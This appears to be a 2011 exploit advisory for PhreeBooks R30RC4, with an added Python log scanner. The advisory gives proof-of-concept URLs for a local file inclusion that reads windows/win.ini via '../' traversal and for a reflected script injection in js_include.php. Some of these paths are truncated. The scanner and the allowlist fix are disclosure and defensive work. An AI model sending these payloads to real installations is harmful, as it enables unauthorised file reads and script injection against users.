------------------------------------------------------------------------
Software................PhreeBooks R30RC4
Vulnerability...........Local File Inclusion
Download................ https://tik.lat/tUQ5r
Release Date............2/22/2011
Tested On...............Windows Vista + XAMPP
------------------------------------------------------------------------
Author..................AutoSec Tools
Site.................... https://tik.lat/KpzlI
------------------------------------------------------------------------
--PoC--
http://localhost/phreedom/index.php?page=../../../../../../../../windows/win.ini
------------------------------------------------------------------------
Software................PhreeBooks R30RC4
Vulnerability...........Reflected Cross-site Scripting
Download................ https://tik.lat/jypWC
Release Date............2/22/2011
Tested On...............Windows Vista + XAMPP
------------------------------------------------------------------------
Author..................AutoSec Tools
Site.................... https://tik.lat/zDRxd
------------------------------------------------------------------------
--PoC--
http://localhost/phreedom/modules/s...pping/js_include.php?form=';alert(0)</script>
http://localhost/phreedom/modules/s...l_mgr/js_include.php?form=";alert(0)</script>
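
A defender-side check for the two request shapes in the PoCs above, as an added example that is not part of the original advisory. It flags traversal sequences in the page parameter of index.php and non-identifier characters in the form parameter of js_include.php. The sample request lines, the "example" module path and the identifier allowlist are constructed assumptions.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote

# Constructed request targets (not from a real log); "example" is a placeholder module.
SAMPLE_REQUESTS = [
    "/phreedom/index.php?page=main",
    "/phreedom/index.php?page=../../../../windows/win.ini",
    "/phreedom/index.php?page=..%252f..%252fwindows%252fwin.ini",
    "/phreedom/modules/example/js_include.php?form=orders",
    "/phreedom/modules/example/js_include.php?form=%27;alert(0)%3C/script%3E",
]

# Assumed allowlist: both parameters should only ever carry a simple identifier.
SAFE_NAME = re.compile(r"^[A-Za-z0-9_]+$")

def fully_decode(value, rounds=3):
    """Percent-decode repeatedly so double-encoded input is normalised."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def classify(request_target):
    """Return the list of findings for one request target."""
    parts = urlsplit(request_target)
    params = parse_qs(parts.query, keep_blank_values=True)
    findings = []
    if parts.path.endswith("/index.php"):
        for raw in params.get("page", []):
            value = fully_decode(raw).replace("\\", "/")
            if ".." in value.split("/") or "\x00" in value:
                findings.append("traversal-in-page")
            elif not SAFE_NAME.match(value):
                findings.append("unexpected-page-value")
    if parts.path.endswith("/js_include.php"):
        for raw in params.get("form", []):
            if not SAFE_NAME.match(fully_decode(raw)):
                findings.append("unsafe-form-value")
    return findings

def scan(targets):
    """Return (target, findings) pairs for every flagged request."""
    return [(t, f) for t in targets if (f := classify(t))]

if __name__ == "__main__":
    for target, findings in scan(SAMPLE_REQUESTS):
        print(findings, target)
```

The same allowlist, applied server-side before the value reaches an include path or a script block, is the corresponding fix for both issues.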
